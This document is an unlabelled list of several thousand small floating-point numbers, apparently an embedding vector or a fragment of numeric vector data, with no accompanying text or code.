0.0113829355686903, -0.021550416946411133, 0.033131375908851624, -0.026084471493959427, -0.008631092496216297, -0.009320760145783424, 0.005684639327228069, 0.007483921945095062, 0.027969108894467354, 0.022547362372279167, 0.0015039541758596897, 0.00418580649420619, -0.013690933585166931, -0.01190189365297556, -0.009771434590220451, 0.035343777388334274, -0.021468475461006165, 0.012270627543330193, -0.026166412979364395, 0.0034910172689706087, -0.019064880907535553, -0.004011682700365782, 0.047197870910167694, 0.04255456104874611, -0.0006717434152960777, 0.005869006272405386, 0.022164972499012947, 0.016292551532387733, -0.009218334220349789, -0.020812951028347015, -0.0054627167992293835, 0.009935315698385239, -0.0008505620644427836, -0.002024619374424219, 0.022533705458045006, 0.00908859446644783, 0.0070127625949680805, -0.05970749258995056, -0.028488067910075188, -0.008596950210630894, 0.0070127625949680805, 0.019843317568302155, -0.015473145060241222, 0.03192957863211632, 0.0002921273116953671, 0.020403247326612473, -0.016019416972994804, -0.013069549575448036, -0.0315471887588501, -0.0015526064671576023, 0.03307674825191498, 0.022151315584778786, -0.01758994720876217, 0.005377361550927162, 0.016715912148356438, 0.030072255060076714, 0.022328853607177734, -0.012912495993077755, 0.03875797614455223, 0.1006232425570488, -0.007162987254559994, -0.014981500804424286, -0.01701636239886284, 0.003663434414193034, -0.0099489726126194, 0.017467036843299866, 0.021195340901613235, -0.015350233763456345, -0.033431824296712875, 0.036490947008132935, -0.022137658670544624, 0.0032178815454244614, -0.0068249814212322235, -0.008344300091266632, -0.023981325328350067, 0.020034512504935265, 0.0017386802937835455, -0.0002458222443237901, 0.0327489860355854, -0.0216323584318161, -0.03548034280538559, -0.011219054460525513, 0.013274401426315308, -0.03332257270812988, 0.0019085366511717439, -0.03548034280538559, -0.0445757694542408, 0.033513765782117844, -0.01655203104019165, -0.05582896247506142, -0.025374319404363632, -0.0028764617163687944, 0.014762992039322853, 0.0198979452252388, -0.02611178532242775, 0.015104411169886589, -0.020444216206669807, 0.03589004650712013, 0.008617435581982136, 0.004349688068032265, -0.009307103231549263, 0.004988143220543861, 0.019856974482536316, -0.014708364382386208, 0.06249347701668739, 0.01186092384159565, 0.01100054569542408, 0.01151950377970934, 0.003547351574525237, -0.04591413214802742, -0.039632007479667664, -0.02045787312090397, -0.020034512504935265, -0.02497827261686325, -0.036409005522727966, 0.012482307851314545, -0.01693442091345787, 0.027422837913036346, 0.014954186975955963, 0.020635413005948067, -0.015022470615804195, 0.01952921226620674, 0.013458767905831337, 0.05347999557852745, -0.004755977541208267, 0.004086794797331095, -0.011225882917642593, 0.022615646943449974, 0.022151315584778786, -0.022834155708551407, 0.002705751918256283, -0.005339805502444506, -0.024076923727989197, -0.030755095183849335, 0.038320958614349365, -0.051513418555259705, 0.02038959041237831, -0.037255726754665375, 0.00719712907448411, -0.01903756707906723, 0.005626597907394171, -0.015759937465190887, -0.004762805998325348, 0.003977540414780378, 0.018409354612231255, 0.055910903960466385, -0.012284284457564354, -0.04045141488313675, -0.017453379929065704, 0.00943001452833414, 0.04678816720843315, -0.009846546687185764, -0.003980954643338919, -0.004383829887956381, -0.015077098272740841, -0.03875797614455223, -0.008310157805681229, -0.002656246069818735, 0.006162627134472132, -0.02437737211585045, -0.004247262142598629, 0.016893452033400536, -0.0030454646330326796, -0.02392669953405857, -0.03253047913312912, 0.011601444333791733, 0.02217862941324711, -0.02287512645125389, -0.038484837859869, -0.001655032392591238, 0.0018026964971795678, -0.010024084709584713, -0.025852305814623833, -0.021878181025385857, -0.0455317422747612, -0.029963001608848572, -0.034770190715789795, 0.006463076453655958, 0.008631092496216297, -0.014421571977436543, 0.0029703520704060793, 0.016511060297489166, -0.010741066187620163, 0.0025896690785884857, 0.040888432413339615, 0.02297072298824787, -0.009218334220349789, 0.03493407368659973, -0.0012845919700339437, 0.0013708004262298346, -0.015814565122127533, 0.011854095384478569, -0.04351053759455681, -0.040232907980680466, -0.02077198028564453, 0.0062650530599057674, -0.016975391656160355, -0.027859855443239212, -0.0014612766681239009, 0.019365331158041954, -0.02131825126707554, -0.018996596336364746, -0.006312851794064045, -0.01685248129069805, -0.016989048570394516, -0.041762467473745346, 0.017070990055799484, 0.04782608523964882, -0.011819953098893166, -0.012714472599327564, -0.008644749410450459, 0.02678096853196621, -0.04763488844037056, 0.024650508537888527, 0.02467782236635685, 0.018245473504066467, -0.0617833249270916, 0.008303329348564148, 0.004571611061692238, -0.04687010869383812, 0.06293049454689026, -0.04872743412852287, -0.015432174317538738, 0.014940530061721802, -0.0005680371541529894, -0.01310369186103344, -0.028733888640999794, 0.007429294753819704, -0.011403420940041542, 0.0017369731795042753, 0.000059108300774823874, 0.04277307167649269, 0.029525984078645706, 0.01997988671064377, 0.009129565209150314, 0.002058761427178979, 0.019297046586871147, 0.00042912201024591923, -0.021031459793448448, -0.032011520117521286, 0.009163707494735718, -0.04282769933342934, -0.009450499899685383, 0.009593895636498928, -0.010700096376240253, -0.010515729896724224, 0.005978260654956102, -0.023790130391716957, -0.011437563225626945, -0.00048652320401743054, -0.022806841880083084, -0.02697216346859932, 0.010187966749072075, 0.021290937438607216, -0.03780199959874153, -0.014831275679171085, 0.0051178825087845325, -0.014162092469632626, -0.018887342885136604, -0.017289498820900917, 0.04897325485944748, -0.025319691747426987, 0.014039182104170322, -0.036791395395994186, -0.0359719879925251, -0.014366944320499897, 0.03608124330639839, -0.011021031066775322, -0.002497485838830471, 0.02689022198319435, -0.0445757694542408, -0.039932459592819214, -0.023011693730950356, 0.01282372698187828, 0.04083380848169327, -0.013888956978917122, -0.02477342076599598, 0.031246738508343697, -0.07686042040586472, -0.018395697697997093, 0.01458545308560133, -0.06702753156423569, -0.01883271522819996, 0.021741611883044243, 0.0014553018845617771, -0.034879446029663086, -0.023954013362526894, 0.03542571887373924, 0.017671888694167137, -0.008282843977212906, 0.008644749410450459, -0.006449420005083084, -0.00753172067925334, 0.005551485810428858, 0.011225882917642593, -0.03127405419945717, -0.012393537908792496, 0.037747371941804886, 0.017849426716566086, 0.023954013362526894, 0.0009030553628690541, 0.018600549548864365, 0.01386847160756588, -0.0002118936536135152, 0.03356839343905449, -0.05012042447924614, -0.06451468169689178, -0.024705136194825172, 0.027054104954004288, 0.03673676773905754, -0.032284654676914215, -0.008692547678947449, 0.01105517242103815, 0.0017147809267044067, 0.012892011553049088, 0.012011148035526276, 0.01827278733253479, -0.02440468594431877, -0.04323740303516388, -0.01997988671064377, -0.023079978302121162, 0.000955121882725507, -0.01921510510146618, -0.010577185079455376, -0.0187644325196743, -0.005414918065071106, 0.029607923701405525, -0.002830370096489787, -0.010877634398639202, 0.030345391482114792, -0.015008813701570034, 0.04127082601189613, -0.0005748655530624092, -0.05981674790382385, -0.006845466792583466, -0.006801082286983728, -0.031629130244255066, 0.04323740303516388, 0.0245002843439579, 0.0011889943853020668, 0.01627889648079872, 0.013957240618765354, -0.054763734340667725, -0.047033991664648056, 0.0005633426480926573, 0.026098128408193588, -0.0012598390458151698, -0.01636083610355854, 0.019542869180440903, -0.033513765782117844, -0.004872060380876064, -0.03971394896507263, 0.013527052477002144, -0.02047153003513813, -0.0006388817564584315, 0.038894541561603546, -0.027955451980233192, -0.03662751615047455, 0.012591562233865261, -0.0030096154659986496, 0.026002531871199608, -0.017630917951464653, -0.01701636239886284, 0.014093808829784393, 0.025784023106098175, 0.009914830327033997, 0.014257690869271755, -0.01914682239294052, -0.010966403409838676, 0.012256970629096031, -0.025292377918958664, -0.016524717211723328, 0.023899385705590248, 0.005230551119893789, 0.011021031066775322, -0.011444391682744026, -0.012680331245064735, 0.019283389672636986, 0.03599930182099342, 0.013513395562767982, -0.045012783259153366, 0.008269187062978745, -0.007203957531601191, 0.07565862685441971, -0.0070127625949680805, -0.04427531734108925, -0.006046544294804335, 0.005531000439077616, -0.032776299864053726, -0.002444565761834383, 0.022916097193956375, 0.04097037389874458, -0.056484490633010864, -0.030673153698444366, -0.014612766914069653, -0.01061815582215786, -0.04987460374832153, 0.0155960563570261, -0.03321331739425659, 0.02066272497177124, -0.022164972499012947, 0.02430908940732479, 0.005670982878655195, 0.00029447456472553313, 0.034060038626194, -0.026180069893598557, -0.028542693704366684, -0.007518063765019178, 0.01913316547870636, 0.02601618878543377, -0.0011847267160192132, 0.029635237529873848, 0.0050222850404679775, -0.011492189951241016, -0.005418332293629646, 0.031137485057115555, 0.00602605938911438, -0.016989048570394516, -0.019665779545903206, -0.004267747513949871, -0.005131539423018694, 0.018436668440699577, 0.019665779545903206, 0.008228217251598835, 0.006070443894714117, -0.001453594770282507, -0.02153676003217697, 0.004441871307790279, -0.005995331332087517, -0.016210611909627914, 0.018218159675598145, -0.04785339906811714, -0.01033136248588562, 0.004318960476666689, 0.02026667818427086, -0.0041038659401237965, 0.021878181025385857, 0.027668660506606102, 0.015200008638203144, 0.015527771785855293, -0.017248528078198433, -0.0013247088063508272, -0.017084646970033646, -0.015145381912589073, -0.0018965869676321745, 0.016524717211723328, -0.024800732731819153, 0.008870085701346397, 0.009689494036138058, 0.02200109139084816, -0.004277990199625492, -0.011744841001927853, 0.03080972097814083, 0.01046793069690466, -0.008719861507415771, -0.023598935455083847, -0.02564745396375656, 0.05539194494485855, -0.01828644424676895, -0.02649417519569397, 0.016115013509988785, -0.06817470490932465, 0.00923199113458395, 0.002630639588460326, -0.029143592342734337, -0.01104834396392107, 0.015568742528557777, -0.023516995832324028, 0.040506042540073395, 0.036217812448740005, -0.0024309088476002216, 0.010106026194989681, -0.005322734359651804, 0.041680529713630676, 0.027955451980233192, 0.01769920252263546, 0.012748614884912968, -0.02066272497177124, -0.02077198028564453, -0.0022567848209291697, -0.03635437786579132, 0.008692547678947449, -0.017753828316926956, 0.03862140700221062, -0.020225707441568375, -0.011034687981009483, -0.0004950587172061205, 0.031219424679875374, 0.0015389496693387628, 0.033732276409864426, 0.03463362529873848, 0.04714324325323105, -0.018327414989471436, 0.03976857662200928, -0.01333585660904646, 0.019365331158041954, -0.019064880907535553, 0.012086260132491589, 0.028488067910075188, 0.04274575784802437, -0.03386884182691574, -0.008576464839279652, -0.01720755733549595, 0.009279790334403515, -0.012352568097412586, -0.011321480385959148, -0.035343777388334274, -0.0042097060941159725, -0.0026255182456225157, 0.00962120946496725, -0.00817358959466219, -0.03933155909180641, 0.005066669546067715, 0.0001727370690787211, -0.006524532102048397, -0.0512675940990448, -0.013622649945318699, 0.046651601791381836, -0.04383829981088638, 0.005302249453961849, 0.011628758162260056, 0.005855349358171225, -0.01627889648079872, -0.016511060297489166, -0.024336403235793114, 0.015350233763456345, -0.026767311617732048, 0.0019136578775942326, -0.008945198729634285, 0.012734957970678806, 0.01980234868824482, -0.03272167220711708, -0.016961734741926193, 0.016811510547995567, -0.022506391629576683, -0.023585278540849686, -0.010877634398639202, -0.001664421521127224, 0.04435725882649422, -0.023476025089621544, -0.03269435837864876, 0.00975094921886921, -0.01969309337437153, 0.00719712907448411, 0.03149256110191345, -0.0036941622383892536, -0.012489136308431625, 0.01190872211009264, 0.043373968452215195, -0.03233928233385086, 0.011594615876674652, 0.023202888667583466, 0.007094703149050474, -0.015322919934988022, -0.022601990029215813, 0.013308543711900711, -0.007743400987237692, 0.021782582625746727, -0.015527771785855293, 0.009252476505935192, -0.004680865444242954, 0.007975566200911999, 0.0369279645383358, -0.008392098359763622, -0.016797853633761406, -0.004288232419639826, -0.028843143954873085, 0.0237218476831913, -0.003072777995839715, 0.01511806808412075, 0.007743400987237692, -0.028761202469468117, -0.022929752245545387, 0.011260024271905422, -0.005677811335772276, 0.047197870910167694, -0.008555980399250984, -0.0002447552978992462, -0.015951132401823997, -0.023503338918089867, -0.001235086121596396, 0.02993568778038025, 0.0007366131758317351, -0.00937538780272007, -0.019583839923143387, 0.01905122399330139, 0.019870631396770477, 0.02716335840523243, 0.004421386402100325, -0.042336054146289825, 0.0022414210252463818, 0.03395078331232071, -0.00373171828687191, -0.0010438909521326423, -0.016196954995393753, -0.0012743494007736444, 0.021208997815847397, 0.003557594260200858, 0.013527052477002144, 0.015527771785855293, 0.009218334220349789, -0.016593001782894135, 0.028378812596201897, 0.007668288424611092, 0.002058761427178979, -0.0073814960196614265, 0.038594093173742294, 0.05615672841668129, -0.026343951001763344, -0.015896504744887352, -0.021031459793448448, -0.019665779545903206, -0.01712561585009098, -0.0041994634084403515, 0.008719861507415771, -0.036327064037323, -0.02791448123753071, -0.022028405219316483, -0.01892831362783909, 0.033240631222724915, -0.01647009141743183, -0.0032537307124584913, 0.040697239339351654, 0.03837558254599571, 0.005602698773145676, -0.012830555438995361, -0.0070127625949680805, 0.006927407346665859, -0.013090034946799278, 0.03750155121088028, -0.014858589507639408, 0.025715738534927368, 0.011778982356190681, 0.011929207481443882, 0.007224442902952433, -0.0008876914507709444, -0.018300101161003113, 0.029607923701405525, -0.010631811805069447, 0.004090209025889635, 0.02966255135834217, 0.0022806841880083084, 0.050065796822309494, 0.015664339065551758, 0.005472959019243717, -0.01119174063205719, 0.027818884700536728, 0.0028508552350103855, -0.014913216233253479, -0.013841158710420132, -0.016893452033400536, -0.007600004319101572, -0.008084820583462715, 0.009580239653587341, 0.004097037483006716, 0.022888783365488052, 0.01722121424973011, 0.01420306321233511, 0.03987783193588257, 0.0178084559738636, -0.018709804862737656, 0.014913216233253479, -0.026739997789263725, 0.026139099150896072, -0.013185632415115833, -0.014339631423354149, 0.017945023253560066, 0.0206763818860054, 0.007190300617367029, 0.01205211877822876, -0.002418959280475974, 0.005066669546067715, -0.05192312225699425, -0.021960120648145676, -0.021591387689113617, -0.016101356595754623, -0.003347621066495776, 0.01952921226620674, -0.007429294753819704, 0.011662900447845459, -0.010720581747591496, -0.014257690869271755, -0.00994214415550232, -0.0002671609981916845, -0.023216545581817627, -0.011758497916162014, -0.025606485083699226, -0.023025350645184517, 0.0015508993528783321, -0.0315471887588501, -0.0181635320186615, 0.01894197054207325, -0.004428214859217405, -0.02075832337141037, 0.017371438443660736, -0.013397312723100185, 0.011758497916162014, -0.0023848172277212143, -0.04542249068617821, 0.018436668440699577, -0.002355796517804265, 0.004885717295110226, 0.00831698626279831, -0.010263078846037388, -0.01787674054503441, -0.0022977550979703665, 0.0089042279869318, -0.020403247326612473, 0.03378690406680107, -0.02439102903008461, -0.0111439423635602, -0.008535495027899742, -0.01961115188896656, -0.022724900394678116, 0.04793533682823181, -0.020717352628707886, 0.001418599276803434, -0.013240259140729904, 0.00837161298841238, 0.001367386314086616, 0.008255530148744583, -0.022888783365488052, -0.0308916624635458, 0.0012069189688190818, -0.017275841906666756, -0.009402700699865818, -0.026644401252269745, 0.001480054808780551, -0.00013752815721090883, 0.008911056444048882, -0.008112134411931038, 0.02189183607697487, -0.009791919961571693, 0.03261241689324379, 0.02745015174150467, -0.0024582224432379007, 0.0044009010307490826, 0.003252023598179221, 0.026576116681098938, -0.02045787312090397, -0.025975218042731285, -0.031902264803647995, 0.019788691774010658, 0.012011148035526276, -0.007477093487977982, -0.004441871307790279, -0.003847801126539707, 0.017480693757534027, -0.01730315573513508, -0.018122563138604164, 0.04129813611507416, 0.0162515826523304, -0.030645839869976044, 0.013656791299581528, 0.017644574865698814, -0.017849426716566086, -0.0006107146618887782, -0.0036395350471138954, -0.005223722662776709, 0.03012688271701336, 0.0039263274520635605, 0.015131724998354912, -0.006415277719497681, -0.010747894644737244, 0.005097397603094578, -0.012140887789428234, -0.006060201209038496, -0.012338911183178425, 0.009464156813919544, 0.000433176348451525, -0.005544657353311777, 0.023844758048653603, 0.025142153725028038, -0.014093808829784393, 0.01138976402580738, 0.019925259053707123, 0.004609167110174894, -0.02171429805457592, 0.010741066187620163, -0.0019051224226132035, -0.00011277522571617737, -0.0012410609051585197, -0.014517169445753098, -0.02592059038579464, -0.03176569566130638, 0.034196607768535614, 0.00850818119943142, 0.01666128635406494, -0.022028405219316483, 0.022137658670544624, 0.002961816731840372, -0.017057333141565323, 0.02545625902712345, -0.0017352660652250051, -0.01105517242103815, -0.03100091777741909, -0.019816003739833832, -0.0013255623634904623, 0.005322734359651804, -0.047033991664648056, 0.027873512357473373, 0.034879446029663086, -0.01797233708202839, 0.013042235746979713, -0.04670622572302818, -0.015131724998354912, -0.012536934576928616, -0.007914111018180847, -0.003257144708186388, -0.02144116349518299, 0.015268293209373951, 0.00550027284771204, 0.010604498907923698, -0.04536786302924156, 0.02544260211288929, -0.013786531053483486, -0.02267027460038662, -0.03138330578804016, -0.0129671236500144, -0.023079978302121162, -0.022451765835285187, 0.013841158710420132, 0.0251558106392622, 0.028488067910075188, 0.006224082782864571, -0.00007660606206627563, -0.016975391656160355, 0.0002654538839124143, 0.01406649500131607, 0.010420132428407669, -0.00923199113458395, 0.024049609899520874, -0.01655203104019165, -0.005029113497585058, 0.016879795119166374, 0.003252023598179221, 0.010488416068255901, -0.044056810438632965, 0.006367478985339403, -0.015473145060241222, -0.0029532811604440212, 0.011096143163740635, -0.027518434450030327, -0.016224268823862076, 0.01229794044047594, 0.011212226003408432, -0.004407729487866163, -0.030837034806609154, 0.01362947840243578, 0.007320040371268988, -0.018709804862737656, 0.006688413675874472, -0.0027296512853354216, -0.04435725882649422, 0.005667568650096655, -0.023585278540849686, 0.021304594352841377, 0.04217217117547989, 0.003108627162873745, 0.026139099150896072, 0.018300101161003113, -0.020253021270036697, -0.01243450865149498, -0.025292377918958664, 0.001409210148267448, -0.011731184087693691, -0.028815830126404762, -0.009962629526853561, -0.005373947322368622, 0.049519527703523636, -0.012175030075013638, 0.0003245621919631958, -0.02131825126707554, 0.0057256100699305534, -0.020498843863606453, -0.007033247500658035, -0.014762992039322853, 0.013745560310781002, -0.018600549548864365, 0.03384152799844742, -0.016565687954425812, 0.009361730888485909, 0.017931368201971054, -0.02267027460038662, -0.018969284370541573, -0.01349291019141674, -0.005483201704919338, -0.0001251516951015219, -0.020212052389979362, -0.0445757694542408, -0.023298487067222595, -0.008398926816880703, 0.027887169271707535, -0.027231642976403236, -0.01809524931013584, 0.025961561128497124, 0.024418342858552933, -0.023079978302121162, -0.017098303884267807, 0.006848881021142006, -0.03321331739425659, -0.025032898411154747, -0.0029208462219685316, -0.010440616868436337, -0.012338911183178425, 0.00000906896275409963, -0.018149875104427338, -0.0063913785852491856, -0.021686984226107597, 0.04288232699036598, 0.0066542718559503555, 0.0005206651985645294, -0.005182752385735512, -0.002925967564806342, -0.005800722166895866, 0.0035917360801249743, -0.03176569566130638, 0.009470985271036625, -0.033732276409864426, -0.018900999799370766, -0.02236982434988022, 0.017945023253560066, 0.025975218042731285, 0.021222654730081558, -0.03326794505119324, 0.024705136194825172, 0.01905122399330139, -0.0394408144056797, -0.005705124698579311, -0.0005612087552435696, -0.00021605471556540579, -0.03594467416405678, 0.037255726754665375, -0.0016686891904100776, 0.02727261371910572, -0.009477813728153706, 0.029034338891506195, 0.01008554082363844, 0.0063708932138979435, -0.015432174317538738, -0.001191555056720972, -0.01158095896244049, 0.012857869267463684, -0.039632007479667664, -0.0007024712394922972, 0.03750155121088028, -0.006760112009942532, 0.010631811805069447, -0.01118491217494011, -0.02018473856151104, -0.046433091163635254, 0.032284654676914215, 0.02878851629793644, 0.008467210456728935, -0.024650508537888527, 0.0154458312317729, 0.020894890651106834, 0.0037351325154304504, -0.00523396534845233, -0.03269435837864876, -0.023120949044823647, -0.00818724650889635, 0.04009633883833885, -0.002634053584188223, 0.01972040720283985, 0.0029686451889574528, -0.022888783365488052, 0.018573235720396042, 0.02000720053911209, 0.03624512627720833, -0.03796587884426117, -0.009136393666267395, -0.02631663717329502, -0.018491296097636223, 0.005039356183260679, 0.007586347870528698, -0.004885717295110226, -0.0012385002337396145, 0.014216720126569271, -0.0007955080945976079, 0.0017463621916249394, -0.005838278215378523, -0.0016149155562743545, 0.0031803252641111612, 0.0073814960196614265, -0.039659321308135986, 0.00504618464037776, -0.005855349358171225, -0.04973803460597992, 0.018013307824730873, 0.04441188648343086, 0.0011975299566984177, 0.00865157786756754, -0.0012103331973776221, -0.009669008664786816, 0.014681050553917885, 0.006043130066245794, 0.0022209356538951397, 0.0032264171168208122, -0.00432920316234231, 0.016388149932026863, -0.008644749410450459, 0.04798996448516846, -0.03365033492445946, 0.010570356622338295, -0.01209308858960867, 0.005216894205659628, -0.05298835039138794, 0.01511806808412075, 0.02467782236635685, -0.007081046234816313, -0.0198979452252388, 0.006247982382774353, 0.004667208530008793, -0.010071883909404278, -0.02689022198319435, 0.0015876020770519972, 0.019256075844168663, -0.006497218739241362, 0.019378988072276115, -0.014530826359987259, 0.015555085614323616, -0.0013784824404865503, 0.0039365701377391815, 0.000766914221458137, -0.0057392665185034275, 0.0069069224409759045, -0.007408809382468462, 0.010884462855756283, 0.00798239465802908, 0.004281403962522745, -0.007285898085683584, -0.0103381909430027, 0.008091649040579796, -0.025183124467730522, 0.02086757682263851, -0.013308543711900711, -0.02258833311498165, -0.005660740192979574, -0.028269559144973755, -0.009798748418688774, -0.004994971677660942, -0.04689742252230644, 0.016319865360856056, 0.006664514075964689, -0.018504953011870384, 0.021359222009778023, 0.08494524657726288, -0.005616355687379837, -0.009163707494735718, -0.001891465624794364, -0.02294340915977955, -0.004373587667942047, -0.00297888764180243, -0.009669008664786816, 0.031711071729660034, -0.00504618464037776, 0.007326868828386068, 0.029771804809570312, 0.012892011553049088, 0.03976857662200928, 0.03187495097517967, 0.004172150045633316, -0.01229111198335886, -0.013042235746979713, 0.022315196692943573, -0.03365033492445946, 0.02217862941324711, 0.00478329136967659, 0.010263078846037388, 0.0013708004262298346, 0.022124001756310463, -0.015732623636722565, -0.014858589507639408, -0.01865517720580101, -0.03556228429079056, 0.009669008664786816, 0.014776648953557014, 0.004639895167201757, -0.010993717238307, -0.013602164573967457, -0.009744120761752129, 0.009334417060017586, -0.00648014759644866, 0.003625878132879734, -0.009402700699865818, -0.02112705633044243, -0.01569165289402008, -0.00006236245826585218, -0.02574305236339569, 0.005578799173235893, -0.010611327365040779, -0.014530826359987259, -0.007470265030860901, 0.011178083717823029, -0.019856974482536316, 0.009928487241268158, -0.014039182104170322, 0.001821474521420896, -0.003426147624850273, -0.0014578625559806824, -0.00003470211959211156, -0.011355622671544552, -0.0015269999857991934, 0.0054763732478022575, -0.022642960771918297, -0.0018607378005981445, -0.0005740119959227741, 0.0036019787658005953, -0.03127405419945717, -0.004264333285391331, -0.004878888837993145, 0.006923993118107319, -0.03365033492445946, 0.0018880513962358236, -0.02775060012936592, 0.01597844623029232, 0.008952027186751366, 0.001357143628410995, -0.008931541815400124, 0.0025691839400678873, -0.0181635320186615, -0.027682317420840263, -0.0069069224409759045, -0.0051793381571769714, 0.002197036286816001, -0.01712561585009098, -0.008631092496216297, 0.0027194085996598005, -0.003171789925545454, 0.01921510510146618, 0.005203237757086754, 0.03722841292619705, -0.036327064037323, 0.0005603552563115954, 0.011232711374759674, -0.009027139283716679, -0.00753172067925334, 0.01454448327422142, 0.00908859446644783, -0.010590841993689537, 0.017767485231161118, 0.025674767792224884, 0.010693267919123173, -0.012338911183178425, -0.01712561585009098, -0.031246738508343697, 0.020048169419169426, -0.0009158586035482585, -0.012188686057925224, -0.00621384009718895, -0.002659660065546632, -0.00818724650889635, 0.02410423755645752, -0.010201623663306236, -0.02007548324763775, -0.0005590749206021428, -0.018436668440699577, 0.014954186975955963, 0.01741240918636322, -0.010194795206189156, -0.0017634332180023193, 0.00813261978328228, -0.0013332442613318563, -0.015404860489070415, -0.01597844623029232, -0.028351498767733574, -0.01932436041533947, 0.0017736757872626185, 0.02418617717921734, -0.03834827244281769, 0.01186092384159565, 0.011669727973639965, 0.00478670559823513, -0.018709804862737656, 0.016210611909627914, 0.0026477104984223843, 0.013834330253303051, 0.016306208446621895, 0.017576290294528008, -0.01209991704672575, 0.011744841001927853, -0.016524717211723328, 0.018122563138604164, 0.030400017276406288, -0.013752388767898083, 0.006862537935376167, 0.01152633223682642, 0.012482307851314545, -0.012482307851314545, 0.006705484818667173, -0.00406972412019968, 0.01921510510146618, 0.008938370272517204, -0.0001907683035824448, 0.01013333909213543, 0.013513395562767982, 0.007600004319101572, -0.030154196545481682, 0.019734064117074013, 0.020799294114112854, -0.006299195345491171, -0.040506042540073395, -0.01172435563057661, 0.000892812735401094, 0.007791199721395969, 0.0002754830929916352, -0.013329028151929379, 0.006971792317926884, 0.005070083774626255, -0.01506344135850668, -0.013137833215296268, 0.0124276801943779, -0.010160652920603752, -0.013062721118330956, -0.014366944320499897, 0.01580090820789337, 0.019843317568302155, 0.00008295434236060828, -0.03670945763587952, -0.00818041805177927, 0.022697588428854942, 0.023557964712381363, 0.02134556509554386, -0.015814565122127533, 0.03080972097814083, -0.004226776771247387, 0.0029959585517644882, 0.0005283470964059234, 0.02506021223962307, -0.009457328356802464, 0.003834144212305546, -0.01119856908917427, 0.0002746295358520001, -0.00324007379822433, -0.042144857347011566, -0.0006290659657679498, 0.004598924424499273, 0.028925085440278053, -0.015582399442791939, -0.026384921744465828, -0.004909616429358721, -0.02936210110783577, -0.01752166450023651, -0.01884637214243412, -0.008808630518615246, 0.003721475601196289, -0.014257690869271755, 0.00666792830452323, 0.009798748418688774, 0.004919859115034342, 0.015746280550956726, -0.037255726754665375, -0.007429294753819704, 0.007743400987237692, 0.029225533828139305, 0.005288592539727688, -0.010372333228588104, -0.024705136194825172, 0.004476013593375683, -0.013547536917030811, 0.009703150019049644, 0.0020963174756616354, -0.007320040371268988, -0.005018870811909437, 0.005752923432737589, 0.002606739988550544, 0.01080935075879097, 0.013888956978917122, 0.0021885009482502937, 0.02572939544916153, -0.014476198703050613, 0.008016536943614483, 0.021741611883044243, -0.028761202469468117, -0.0014245740603655577, -0.0021048530470579863, -0.026821939274668694, 0.010406475514173508, -0.005172509700059891, 0.005247622262686491, -0.006756697781383991, -0.018149875104427338, -0.005858763586729765, -0.008337471634149551, 0.013527052477002144, 0.013984554447233677, 0.005995331332087517, -0.0013605578569695354, 0.006889851298183203, -0.032776299864053726, 0.0013639720855280757, -0.0001410490513080731, 0.013725075870752335, 0.001218015095219016, -0.01790405437350273, -0.005281764082610607, 0.0037351325154304504, 0.009129565209150314, 0.013014922849833965, -0.021181683987379074, -0.010904948227107525, 0.01913316547870636, -0.01636083610355854, -0.029689865186810493, -0.005469545256346464, -0.0411069430410862, 0.027969108894467354, -0.020348619669675827, -0.0100991977378726, 0.015090754255652428, -0.013936756178736687, 0.010904948227107525, -0.019652122631669044, 0.0002771901781670749, -0.01229794044047594, 0.010686439462006092, 0.013527052477002144, 0.009266133420169353, -0.012038461863994598, -0.003426147624850273, -0.016907107084989548, 0.0007340525626204908, 0.0053910184651613235, 0.008255530148744583, 0.009136393666267395, -0.0031239911913871765, -0.004144836217164993, 0.04312814772129059, 0.014134779572486877, -0.017098303884267807, -0.0005595016991719604, 0.013711418956518173, -0.041462019085884094, -0.019829660654067993, -0.016087699681520462, -0.00994214415550232, 0.005647083278745413, -0.025947904214262962, 0.011307823471724987, -0.0411069430410862, 0.0008996411343105137, -0.018682491034269333, -0.0138616431504488, 0.022902440279722214, 0.021960120648145676, -0.0066337864845991135, 0.0060021597892045975, 0.028624635189771652, 0.011587787419557571, -0.011505846865475178, -0.01769920252263546, -0.010071883909404278, -0.022124001756310463, -0.006568916607648134, 0.03340451046824455, 0.0031239911913871765, -0.012304768897593021, -0.009484642185270786, -0.03905842453241348, -0.0027381866239011288, 0.012256970629096031, -0.0265897735953331, -0.018136220052838326, 0.009908001869916916, -0.013670448213815689, 0.005561728496104479, -0.004994971677660942, 0.0007477093604393303, -0.019870631396770477, -0.03504332900047302, -0.013772874139249325, 0.005814379081130028, -0.02333945594727993, -0.002601618878543377, -0.015937475487589836, -0.0029464527033269405, 0.020826607942581177, 0.00569488201290369, 0.04468502104282379, -0.0022141074296087027, -0.01825913041830063, 0.006210425868630409, 0.00817358959466219, -0.012980780564248562, -0.00086635269690305, 0.00655526015907526, -0.014858589507639408, 0.03531646355986595, -0.00917736440896988, -0.006978620309382677, 0.01798599399626255, 0.003943398594856262, -0.004998385906219482, 0.0013187339063733816, -0.0065484317019581795, 0.003362984862178564, -0.030400017276406288, 0.006043130066245794, 0.010829836130142212, 0.001296541653573513, 0.01014699600636959, 0.033131375908851624, -0.005715367384254932, 0.0071083600632846355, 0.018040621653199196, -0.0222878847271204, -0.019952572882175446, -0.00865157786756754, 0.0002669476089067757, -0.008439897559583187, 0.016142327338457108, -0.04217217117547989, -0.0031939821783453226, -0.004117522854357958, 0.0040082684718072414, -0.003810244845226407, 0.02267027460038662, -0.019952572882175446, 0.009996771812438965, -0.0004741467419080436, 0.016593001782894135, -0.004773048684000969, 0.029034338891506195, -0.04192635044455528, -0.023462368175387383, 0.0245002843439579, -0.003980954643338919, 0.003117162734270096, 0.018586892634630203, -0.01596478931605816, 0.012024804949760437, -0.008528666570782661, -0.024254461750388145, -0.00621384009718895, -0.0262893233448267, -0.017480693757534027, 0.001602965872734785, 0.027695972472429276, -0.003426147624850273, 0.020840264856815338, 0.020703695714473724, -0.014762992039322853, -0.006784011144191027, 0.006613301113247871, -0.0031581330113112926, 0.005490030162036419, -0.011273681186139584, -0.02851538173854351, 0.0011463169939815998, 0.017070990055799484, -0.008091649040579796, 0.0029720591846853495, -0.02380378730595112, -0.00884960126131773, 0.033896155655384064, -0.005114468280225992, 0.009771434590220451, -0.011102971620857716, -0.0162515826523304, -0.015200008638203144, -0.03471556305885315, -0.025224093347787857, 0.009593895636498928, 0.039085738360881805, 0.006684999447315931, -0.0016951492289081216, 0.005701710470020771, -0.011676556430757046, -0.032284654676914215, -0.023940356448292732, 0.0008403194369748235, -0.006893265526741743, -0.011410249397158623, -0.001585894962772727, -0.010399647057056427, 0.017152929678559303, -0.011321480385959148, 0.005111054051667452, 0.004407729487866163, -0.017835769802331924, 0.012878354638814926, 